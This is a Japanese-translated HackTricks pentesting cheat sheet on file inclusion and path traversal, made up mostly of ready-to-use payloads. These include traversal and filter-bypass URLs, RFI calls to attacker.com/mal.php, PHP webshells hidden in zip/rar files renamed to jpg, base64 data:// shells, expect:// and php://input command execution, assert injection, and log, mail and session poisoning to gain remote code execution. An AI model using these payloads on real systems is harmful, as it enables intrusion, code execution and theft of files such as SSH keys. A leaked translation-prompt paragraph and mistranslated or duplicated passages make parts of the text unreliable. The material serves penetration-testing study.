hacktricks/pentesting-web/file-inclusion/README.md

ファイルインクルージョン/パストラバーサル

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ会社で働いていますか？ HackTricksで会社を宣伝したいですか？または、最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
• The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
• 公式のPEASS＆HackTricksのグッズを手に入れましょう。
• 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
• ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。

HackenProofはすべての暗号バグバウンティの場です。

遅延なしで報酬を受け取る
HackenProofのバウンティは、顧客が報酬予算を入金した後にのみ開始されます。バグが検証された後に報酬を受け取ることができます。

Web3ペントestingの経験を積む
ブロックチェーンプロトコルとスマートコントラクトは新しいインターネットです！その成長期におけるweb3セキュリティをマスターしましょう。

Web3ハッカーレジェンドになる
各検証済みのバグごとに評判ポイントを獲得し、週間リーダーボードのトップを制覇しましょう。

HackenProofでサインアップして、ハッキングから報酬を得ましょう！

{% embed url="https://hackenproof.com/register" %}

ファイルインクルージョン

リモートファイルインクルージョン（RFI）： ファイルはリモートサーバーからロードされます（最適：コードを書いてサーバーが実行します）。PHPでは、これはデフォルトで無効になっています（allow_url_include）。
ローカルファイルインクルージョン（LFI）： サーバーがローカルファイルをロードします。

この脆弱性は、ユーザーがいかなる方法でサーバーがロードするファイルを制御できる場合に発生します。

脆弱なPHP関数：require、require_once、include、include_once

この脆弱性を悪用するための興味深いツール：https://github.com/kurobeats/fimap

Blind - Interesting - LFI2RCE files

wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ

Linux

複数の*nix LFIリストを組み合わせ、さらにパスを追加して、次のリストを作成しました:

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt" %}

/を\に変更してみてください
../../../../../を追加してみてください

脆弱性の存在を確認するために、/etc/passwordファイルを見つけるために複数の技術を使用するリストはこちらで見つけることができます。

Windows

複数のリストを統合して、次のリストを作成しました:

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt" %}

/を\に変更してみてください
C:/を削除して../../../../../を追加してみてください

脆弱性の存在を確認するために、/boot.iniファイルを見つけるために複数の技術を使用するリストはこちらで見つけることができます。

OS X

LinuxのLFIリストを確認してください。

基本的なLFIとバイパス

すべての例はローカルファイルインクルージョンのためのものですが、リモートファイルインクルージョンにも適用することができます（page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt)/）。

http://example.com/index.php?page=../../../etc/passwd

非再帰的に剥奪されたトラバーサルシーケンス

In this technique, we will focus on exploiting file inclusion vulnerabilities by using traversal sequences that have been stripped non-recursively. This means that we will not be able to use double encoding or other techniques to bypass input filters.

この技術では、再帰的に剥奪されたトラバーサルシーケンスを使用して、ファイルインクルージョンの脆弱性を悪用します。これは、入力フィルタをバイパスするためのダブルエンコーディングや他の技術を使用することができないことを意味します。

To perform this attack, we need to identify the vulnerable parameter that allows file inclusion. Once we have identified the parameter, we can start testing for traversal sequences that have been stripped non-recursively.

この攻撃を実行するには、ファイルインクルージョンを許可する脆弱なパラメータを特定する必要があります。パラメータを特定したら、再帰的に剥奪されたトラバーサルシーケンスのテストを開始できます。

Here is an example of a traversal sequence that has been stripped non-recursively:

以下は、再帰的に剥奪されたトラバーサルシーケンスの例です。

../../../../etc/passwd

By appending this sequence to the vulnerable parameter, we can attempt to access sensitive files on the server. It is important to note that the number of "../" sequences may vary depending on the directory structure of the server.

このシーケンスを脆弱なパラメータに追加することで、サーバー上の機密ファイルにアクセスしようとすることができます。なお、"../"のシーケンスの数は、サーバーのディレクトリ構造によって異なる場合があることに注意してください。

It is also worth mentioning that some web applications may have additional security measures in place to detect and prevent file inclusion attacks. Therefore, it is important to thoroughly test the vulnerability and understand the application's behavior before proceeding with the attack.

また、一部のWebアプリケーションには、ファイルインクルージョン攻撃を検出および防止するための追加のセキュリティ対策がある場合があります。したがって、攻撃を進める前に、脆弱性を徹底的にテストし、アプリケーションの動作を理解することが重要です。

http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

ヌルバイト（%00）

提供された文字列の末尾に追加の文字をバイパスする（バイパス方法：$_GET['param']."php"）

http://example.com/index.php?page=../../../etc/passwd%00

これはPHP 5.4以降で解決済みです

エンコーディング

ダブルURLエンコード（およびその他）のような非標準のエンコーディングを使用することができます：

http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

既存のフォルダから

おそらくバックエンドはフォルダのパスをチェックしています。

http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd

サーバー上のフォルダーの特定

アプリケーションのコードや許可された文字によっては、ファイルだけでなくフォルダーも再帰的に探索することができる場合があります。そのためには、次の手順を実行します。

• 現在のディレクトリの「深さ」を特定するために、/etc/passwd（Linuxの場合）を正常に取得します。

http://example.com/index.php?page=../../../etc/passwd # depth of 3

• 現在のディレクトリにあるフォルダの名前を推測し、フォルダ名（ここでは private）を追加してから /etc/passwd に戻ります。

http://example.com/index.php?page=private/../../../../etc/passwd # we went deeper down one level, so we have to go 3+1=4 levels up to go back to /etc/passwd

• アプリケーションが脆弱である場合、リクエストには2つの異なる結果があります：
• エラー/出力がない場合、この場所には private フォルダが存在しません
• /etc/passwd からコンテンツを取得した場合、現在のディレクトリに private フォルダが存在することが確認されます
• このテクニックを使用して発見したフォルダは、クラシックなLFIメソッドを使用してファイル（または同じテクニックを再帰的に使用してサブディレクトリ）に対してファズテストを実行できます。

このテクニックを使用して、ファイルシステム内の任意の場所にディレクトリを見つけることも可能です。たとえば、同じ仮定（ファイルシステムの深さ3の現在のディレクトリ）の下で、/var/www/ に private ディレクトリが含まれているかどうかを確認する場合、次のペイロードを使用します：

http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd

次のコマンドのシーケンスは、sed（1）を使用してペイロードを生成し、ffuf（2）などのURLファジングツールの入力として使用することができます。

$ sed 's/^/-H "X-Original-URL: /;s/$/"/' payloads.txt | ffuf -w - -u FUZZ -mc all

このコマンドのシーケンスは、payloads.txtファイル内の各行に対してsedを使用して変換を行います。変換された各行は、-H "X-Original-URL: <変換された行>"の形式になります。その後、ffufは-w -オプションを使用して標準入力からワードリストを読み取り、-u FUZZオプションを使用してURLのFUZZキーワードを指定します。最後に、-mc allオプションを使用してすべてのステータスコードを表示します。

このコマンドのシーケンスを使用すると、ffufはpayloads.txtファイル内の各行を変換し、それぞれの変換された行をURLのFUZZキーワードとして使用してリクエストを送信します。これにより、Webアプリケーションのファイルインクルージョンの脆弱性をテストすることができます。

$ sed 's_^_../../../var/www/_g' /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt | sed 's_$_/../../../etc/passwd_g' > payloads.txt
$ ffuf -u http://example.com/index.php?page=FUZZ -w payloads.txt -mr "root"

当然、深さ/場所/入力ディレクトリリストに応じてペイロードを調整してください。

パスの切り詰め

提供された文字列の末尾にさらに文字を追加することをバイパスします（バイパス方法：$_GET['param']."php"）

In PHP: /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/.
Check if last 6 chars are passwd --> passwd/
Check if last 4 chars are ".php" --> shellcode.php/.

http://example.com/index.php?page=a/../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.

#With the next options, by trial and error, you have to discover how many "../" are needed to delete the appended string but not "/etc/passwd" (near 2027)

http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd

常に、パスを偽のディレクトリ（a/）で始めるようにしてください。

この脆弱性はPHP 5.3で修正されました。

フィルターバイパスのトリック

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd

基本的な RFI

このセクションでは、基本的なリモートファイルインクルージョン（RFI）攻撃について説明します。RFIは、ウェブアプリケーションの脆弱性を悪用して、外部のファイルをサーバーに読み込む攻撃手法です。

RFI攻撃は、ウェブアプリケーションがユーザーからの入力を適切に検証せずにファイルを読み込む場合に発生します。攻撃者は、ウェブアプリケーションが読み込むファイルのパスを制御することができ、任意の外部ファイルを読み込むことができます。

RFI攻撃の一般的な手法は、外部のマルウェアを実行するために悪意のあるPHPスクリプトをサーバーに読み込むことです。攻撃者は、リモートサーバー上の悪意のあるスクリプトを実行することで、サーバー上で任意のコードを実行することができます。

RFI攻撃を実行するためには、以下の手順を実行する必要があります。

1. ターゲットアプリケーションの脆弱性を特定する。
2. リモートファイルを読み込むためのパラメータを見つける。
3. 攻撃者が制御できるリモートサーバー上の悪意のあるスクリプトを用意する。
4. 悪意のあるスクリプトをターゲットアプリケーションに読み込ませる。

RFI攻撃は、ウェブアプリケーションのセキュリティに対する重大な脅威です。開発者は、ユーザーからの入力を適切に検証し、ファイルの読み込みに制限を設けることで、RFI攻撃からアプリケーションを保護する必要があります。

http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php

Pythonのルート要素

Pythonでは、次のようなコードでルート要素を指定します。

# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)

ユーザーが絶対パスを**file_name**に渡す場合、前のパスは単に削除されます。

os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'

以下は、ハッキング技術に関する本の内容です。以下の内容は、pentesting-web/file-inclusion/README.mdファイルからのものです。関連する英文を日本語に翻訳し、翻訳を返し、マークダウンとHTMLの構文を完全に保持してください。コード、ハッキング技術の名前、ハッキングの言葉、クラウド/SaaSプラットフォームの名前（Workspace、aws、gcpなど）、'leak'という単語、pentesting、およびマークダウンタグなどは翻訳しないでください。また、翻訳とマークダウンの構文以外の追加の要素は追加しないでください。

これは[ドキュメント](https://docs.python.org/3.10/library/os.path.html#os.path.join)による意図された動作です：

> コンポーネントが絶対パスである場合、以前のすべてのコンポーネントは破棄され、絶対パスコンポーネントからの結合が続行されます。

## Javaディレクトリのリスト

Javaでパストラバーサルがある場合、**ファイルの代わりにディレクトリを要求**すると、**ディレクトリのリストが返されます**。これは他の言語では起こりません（私の知る限り）。

## 上位25のパラメータ

以下は、ローカルファイルインクルージョン（LFI）の脆弱性に対して脆弱性のある可能性のある上位25のパラメータのリストです（[リンク](https://twitter.com/trbughunters/status/1279768631845494787)から）：

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

PHPラッパーとプロトコルを使用したLFI / RFI

php://filter

PHPフィルターを使用すると、データを読み取る前または書き込む前に基本的な変更操作を行うことができます。フィルターには5つのカテゴリがあります：

• 文字列フィルター:
• string.rot13
• string.toupper
• string.tolower
• string.strip_tags: データからタグを削除します（"<"と">"の間のすべての文字）
• このフィルターは、最新バージョンのPHPから消えています
• 変換フィルター
• convert.base64-encode
• convert.base64-decode
• convert.quoted-printable-encode
• convert.quoted-printable-decode
• convert.iconv.* : 異なるエンコーディングに変換します（convert.iconv.<input_enc>.<output_enc>）。サポートされているすべてのエンコーディングのリストを取得するには、コンソールで次のコマンドを実行します：iconv -l

{% hint style="warning" %} convert.iconv.*変換フィルターを悪用すると、任意のテキストを生成することができます。これは、任意のテキストを書き込むか、任意のテキストを処理するような関数を作成するのに役立ちます。詳細については、phpフィルターを介したLFI2RCEを参照してください。 {% endhint %}

• 圧縮フィルター
• zlib.deflate: コンテンツを圧縮します（大量の情報を外部に持ち出す場合に便利です）
• zlib.inflate: データを解凍します
• 暗号化フィルター
• mcrypt.* : 廃止予定
• mdecrypt.* : 廃止予定
• その他のフィルター
• phpで実行すると、いくつかの予期しないフィルターが見つかる場合があります：var_dump(stream_get_filters());
• consumed
• dechunk: HTTPチャンクエンコーディングを逆転させます
• convert.*

# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.string_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");

# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
=C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");

# Compresion Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally

{% hint style="warning" %} 「php://filter」という部分は大文字小文字を区別しません {% endhint %}

php://fd

このラッパーは、プロセスが開いているファイルディスクリプタにアクセスすることを可能にします。開かれたファイルの内容を外部に持ち出すのに役立つかもしれません：

echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");

以下のように、php://stdin、php://stdout、および php://stderr を使用して、それぞれ ファイルディスクリプタ 0、1、および 2 にアクセスすることもできます（攻撃にどのように役立つかはわかりません）

zip:// および rar://

PHPShell が含まれた Zip または Rar ファイルをアップロードしてアクセスします。
rar プロトコルを悪用するためには、明示的に有効化する必要があります。

echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php

data://

data://は、ファイルインクルージョン（File Inclusion）攻撃の一種です。この攻撃は、ウェブアプリケーションにおいて、外部ファイルを読み込むための機能が不適切に実装されている場合に悪用されます。

この攻撃では、攻撃者はウェブアプリケーションに対して、外部ファイルのパスを指定することができます。通常、ウェブアプリケーションは指定されたパスのファイルを読み込んで表示するため、攻撃者は任意のファイルを読み込むことができます。

data://スキームは、攻撃者が攻撃に使用する外部ファイルを指定するために使用されます。このスキームを使用すると、攻撃者はデータスキームを介して直接データを提供することができます。これにより、攻撃者は任意のデータをウェブアプリケーションに注入することができます。

この攻撃は、ウェブアプリケーションが外部ファイルを読み込む際に適切な入力検証や制限が行われていない場合に成功します。攻撃者は、機密情報の漏洩やシステムの乗っ取りなど、さまざまな悪影響を引き起こすことができます。

ウェブアプリケーションの開発者やセキュリティ担当者は、この攻撃に対する防御策を実装する必要があります。入力検証や制限の強化、外部ファイルの読み込みに関する適切なセキュリティ対策の実施などが重要です。また、セキュリティテストやペネトレーションテストを定期的に実施することも推奨されます。

http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

楽しい事実：XSSをトリガーし、Chromeオーディターをバイパスすることができます。以下のコードを使用します：http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

ただし、このプロトコルはphpの設定で制限されています。allow_url_open と allow_url_include を設定する必要があります。

expect://

Expectを有効にする必要があります。これを使用してコードを実行できます。

http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

input://

POSTパラメーターにペイロードを指定してください。

http://example.com/index.php?page=php://input
POST DATA: <?php system('id'); ?>

phar://

ウェブがファイルをロードするためにincludeのような関数を使用している場合、.pharファイルを使用してPHPコードを実行することもできます。

{% code title="create_phar.php" %}

<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');

$phar->stopBuffering();

{% endcode %}

そして、次の行を実行してpharをコンパイルすることができます。

php --define phar.readonly=0 create_path.php

test.pharというファイルが生成されます。これを使用してLFIを悪用することができます。

LFIが単にファイルを読み取り、その中のPHPコードを実行しない場合、例えばfile_get_contents()、fopen()、file()、file_exists()、md5_file()、filemtime()、filesize()などの関数を使用している場合、pharプロトコルを使用してファイルを読み取る際に発生する逆シリアル化を悪用することができます。 詳細については、次の投稿を読んでください：

{% content-ref url="phar-deserialization.md" %} phar-deserialization.md {% endcontent-ref %}

その他のプロトコル

ここに含める可能性のあるプロトコルをチェックしてください**：**

• php://memoryとphp://temp — メモリまたは一時ファイルに書き込む（ファイルインクルージョン攻撃でどのように役立つかはわかりません）
• file:// — ローカルファイルシステムへのアクセス
• http:// — HTTP(s)のURLへのアクセス
• ftp:// — FTP(s)のURLへのアクセス
• zlib:// — 圧縮ストリーム
• glob:// — パターンに一致するパス名を検索（印刷可能なものを返さないため、ここではあまり役に立ちません）
• ssh2:// — セキュアシェル2
• ogg:// — オーディオストリーム（任意のファイルを読み取るのには役に立ちません）

PHPの'assert'を使用したLFI

".. "などのトラバーサル文字列をフィルタリングしているような難解なLFIに遭遇し、"Hacking attempt"や"Nice try!"などの応答が返される場合、'assert'インジェクションペイロードが機能するかもしれません。

次のようなペイロード：

' and die(show_source('/etc/passwd')) or '

次に、このような「file」パラメータを持つPHPコードを正常に悪用します。

assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

次に、system()関数を使用して脆弱な「assert」ステートメントでRCE（リモートコード実行）を行う方法があります。

' and die(system("whoami")) or '

ペイロードを送信する前に、必ずURLエンコードしてください。

HackenProofはすべての暗号バグ報奨金の場所です。

遅延なしで報酬を受け取る
HackenProofの報奨金は、顧客が報奨金予算を入金した後にのみ開始されます。バグが検証された後に報奨金を受け取ることができます。

Web3ペントestingの経験を積む
ブロックチェーンプロトコルとスマートコントラクトは新しいインターネットです！その成長する日々において、Web3セキュリティをマスターしましょう。

Web3ハッカーレジェンドになる
各検証済みのバグごとに評判ポイントを獲得し、週間リーダーボードのトップを制覇しましょう。

HackenProofでサインアップして、ハッキングから報酬を得ましょう！

{% embed url="https://hackenproof.com/register" %}

PHP Blind Path Traversal

{% hint style="warning" %} このテクニックは、PHP関数がファイルにアクセスするファイルパスを制御できる場合に関連しますが、ファイルの内容（**file()**のような単純な呼び出し）は表示されません。 {% endhint %}

この素晴らしい投稿では、PHPフィルタを使用してエラーオラクルを介してファイルの内容を外部に流出させる方法が説明されています。

要約すると、このテクニックは、「UCS-4LE」エンコーディングを使用してファイルの内容を非常に大きくし、ファイルを開くPHP関数がエラーをトリガーするようにします。

次に、最初の文字を漏洩させるために、フィルタ**dechunkが使用され、他のフィルタ（例：base64またはrot13**）と最後にフィルタconvert.iconv.UCS-4.UCS-4LEとconvert.iconv.UTF16.UTF-16BEが使用され、他の文字が先頭に配置されて漏洩されます。

脆弱性のある可能性のある関数：file_get_contents、readfile、finfo->file、getimagesize、md5_file、sha1_file、hash_file、file、parse_ini_file、copy、file_put_contents（これにより読み取り専用のターゲットのみが対象になります）、stream_get_contents、fgets、fread、fgetc、fgetcsv、fpassthru、fputs

詳細な技術情報については、上記の投稿を確認してください！

LFI2RCE

基本的なRFI

http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php

Apache/Nginxログファイル経由

ApacheまたはNginxサーバーがinclude関数内でLFIに対して脆弱である場合、/var/log/apache2/access.logまたは/var/log/nginx/access.logにアクセスしようとすることができます。ユーザーエージェントまたはGETパラメータの中に、**<?php system($_GET['c']); ?>**のようなPHPシェルを設定し、そのファイルをインクルードします。

{% hint style="warning" %} シェルにはシングルクォートではなくダブルクォートを使用する場合、ダブルクォートは文字列"quote;"に変更され、PHPはエラーをスローし、他の処理は実行されません。

また、ペイロードを正しく記述することを確認してください。そうしないと、ログファイルの読み込みを試みるたびにPHPがエラーを出し、二度目の機会はありません。 {% endhint %}

これは他のログでも行うことができますが、ログ内のコードはURLエンコードされている可能性があるため、これによってシェルが破壊される可能性があります。ヘッダーの**authorisation "basic"**にはBase64で"user:password"が含まれており、ログ内でデコードされます。PHPシェルはこのヘッダー内に挿入される可能性があります。

他の可能なログパス:

/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log

Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

メール経由

内部アカウント（user@localhost）に、<?php echo system($_REQUEST["cmd"]); ?> のようなPHPペイロードを含むメールを送信し、/var/mail/<USERNAME> または /var/spool/mail/<USERNAME> のパスでユーザーのメールをインクルードしようとしてください。

/proc/*/fd/* 経由

1. シェルをたくさんアップロードします（例：100個）
2. http://example.com/index.php?page=/proc/$PID/fd/$FD をインクルードします。ここで、$PID はプロセスのPID（ブルートフォースで見つけることができます）、$FD はファイルディスクリプタ（これもブルートフォースで見つけることができます）です。

/proc/self/environ 経由

ログファイルのように、ペイロードをUser-Agentに送信し、それが/proc/self/environファイル内に反映されます。

GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

アップロード経由

ファイルをアップロードできる場合は、シェルのペイロードを注入します（例：<?php system($_GET['c']); ?>）。

http://example.com/index.php?page=path/to/uploaded/file.png

ファイルを読みやすく保つために、写真/ドキュメント/PDFのメタデータにインジェクトするのが最適です。

Zipファイルのアップロード経由

PHPシェルが圧縮されたZIPファイルをアップロードし、アクセスします。

example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php

PHPセッションを介して

ウェブサイトがPHPセッション（PHPSESSID）を使用しているかどうかを確認します。

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly

PHPでは、これらのセッションは_/var/lib/php5/sess\_[PHPSESSID]_ファイルに保存されます。

/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

クッキーを <?php system('cat /etc/passwd');?> に設定します。

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

ファイルインクルージョン（File Inclusion）を使用してPHPセッションファイルをインクルードする

このテクニックでは、ローカルファイルインクルージョン（Local File Inclusion, LFI）を使用して、ターゲットのウェブアプリケーションにおいてPHPセッションファイルをインクルードします。

攻撃手法の概要

1. ターゲットのウェブアプリケーションにおいて、LFI脆弱性が存在するか確認します。
2. LFI脆弱性を利用して、ウェブアプリケーションのファイルインクルード機能を悪用します。
3. インクルードパラメータにPHPセッションファイルのパスを指定し、セッションデータを取得します。

攻撃手順

1. ターゲットのウェブアプリケーションにおいて、LFI脆弱性が存在するか確認します。通常、以下のようなパラメータを利用してLFIを試みます。

   http://example.com/index.php?page=../../etc/passwd
   

   上記の例では、pageパラメータに../../etc/passwdを指定しています。

2. LFI脆弱性が存在する場合、ウェブアプリケーションのファイルインクルード機能を悪用します。以下のようなパラメータを利用して、ファイルインクルードを試みます。

   http://example.com/index.php?page=/etc/passwd
   

   上記の例では、pageパラメータに/etc/passwdを指定しています。

3. インクルードパラメータにPHPセッションファイルのパスを指定し、セッションデータを取得します。以下のようなパラメータを利用します。

   http://example.com/index.php?page=/var/lib/php/sessions/sess_1234567890abcdef
   

   上記の例では、pageパラメータに/var/lib/php/sessions/sess_1234567890abcdefを指定しています。

対策方法

以下の対策方法を実施することで、LFI攻撃からウェブアプリケーションを保護することができます。

• 入力検証とエスケープ処理を適切に実施する。
• ホワイトリスト方式を使用して、許可されたファイルのみをインクルードする。
• セッションファイルの保存場所を適切に設定する。
• セッションIDのランダム性を高める。
• セッションデータの暗号化を実施する。

以上が、LFIを使用してPHPセッションファイルをインクルードする攻撃手法の概要と対策方法です。

login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2

SSHを介して

SSHがアクティブである場合、使用されているユーザー（/proc/self/statusおよび/etc/passwd）を確認し、<HOME>/.ssh/id_rsaにアクセスを試みます。

vsftpdログを介して

このFTPサーバーのログは、_/var/log/vsftpd.log_に保存されます。LFIがあり、公開されたvsftpdサーバーにアクセスできる場合、ユーザー名にPHPペイロードを設定してログインし、LFIを使用してログにアクセスできます。

ファイル不要のPHPフィルタを介して

この解説記事では、phpフィルタを使用して任意のコンテンツを生成できることが説明されています。これは、ファイルに書き込む必要なく、インクルードのための任意のphpコードを生成できることを意味します。

{% content-ref url="lfi2rce-via-php-filters.md" %} lfi2rce-via-php-filters.md {% endcontent-ref %}

セグメンテーションフォールトを介して

ファイルをアップロードして、一時的に/tmpに保存し、同じリクエストでセグメンテーションフォールトをトリガーし、一時ファイルが削除されないようにし、それを検索できます。

{% content-ref url="lfi2rce-via-segmentation-fault.md" %} lfi2rce-via-segmentation-fault.md {% endcontent-ref %}

Nginx一時ファイルストレージを介して

ローカルファイルインクルージョンが見つかり、NginxがPHPの前で実行されている場合、次のテクニックを使用してRCEを取得できるかもしれません。

{% content-ref url="lfi2rce-via-nginx-temp-files.md" %} lfi2rce-via-nginx-temp-files.md {% endcontent-ref %}

PHP_SESSION_UPLOAD_PROGRESSを介して

セッションがない場合でも、ローカルファイルインクルージョンが見つかり、session.auto_startがOffに設定されている場合、PHP_SESSION_UPLOAD_PROGRESSをマルチパートPOSTデータで提供すると、PHPはセッションを有効にします。これを悪用してRCEを取得できます。

{% content-ref url="via-php_session_upload_progress.md" %} via-php_session_upload_progress.md {% endcontent-ref %}

Windowsの一時ファイルアップロードを介して

ローカルファイルインクルージョンが見つかり、サーバーがWindowsで実行されている場合、RCEを取得できるかもしれません。

{% content-ref url="lfi2rce-via-temp-file-uploads.md" %} lfi2rce-via-temp-file-uploads.md {% endcontent-ref %}

phpinfo()（file_uploads = on）を介して

ローカルファイルインクルージョンが見つかり、file_uploads = onで**phpinfo()**を公開するファイルがある場合、RCEを取得できます。

{% content-ref url="lfi2rce-via-phpinfo.md" %} lfi2rce-via-phpinfo.md {% endcontent-ref %}

compress.zlib + PHP_STREAM_PREFER_STUDIO + パスの開示を介して

ローカルファイルインクルージョンが見つかり、一時ファイルのパスをエクスフィルトできるが、サーバーがインクルードするファイルにPHPマークがあるかどうかをチェックしている場合、この競合状態を使用してそのチェックをバイパスできるかもしれません。

{% content-ref url="lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md" %} lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md {% endcontent-ref %}

永遠の待機 + ブルートフォースを介して

LFIを悪用して一時ファイルをアップロードし、サーバーのPHP実行を停止させることができれば、その後、数時間にわたってファイル名をブルートフォースして一時ファイルを見つけることができます。

{% content-ref url="lfi2rce-via-eternal-waiting.md" %} lfi2rce-via-eternal-waiting.md {% endcontent-ref %}

致命的なエラーへ

/usr/bin/phar、/usr/bin/phar7、/usr/bin/phar.phar7、/usr/bin/phar.pharのいずれかのファイルをインクルードします（同じものを2回インクルードする必要があります）。

これがどのように有用かはわかりませんが、有用かもしれません。
PHP致命的なエラーを引き起こしても、アップロードされたPHP一時ファイルは削除されます。

参考文献

PayloadsAllTheThings
PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders

{% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %}

HackenProofはすべての暗号バグ報奨金の場です。

遅延なしで報酬を受け取る
HackenProofの報奨金は、顧客が報酬予算を入金した後に開始されます。バグが検証された後に報酬を受け取ることができます。

Web3ペントestingの経験を積む
ブロックチェーンプロトコルとスマートコントラクトは新しいインターネットです！成長途中のweb3セキュリティをマスターしましょう。

Web3ハッカーレジェンドになる
各検証済みのバグで評判ポイントを獲得し、週間リーダーボードのトップを制覇しましょう。

HackenProofでサインアップしてハッキングから報酬を得ましょう！

{% embed url="https://hackenproof.com/register" %}

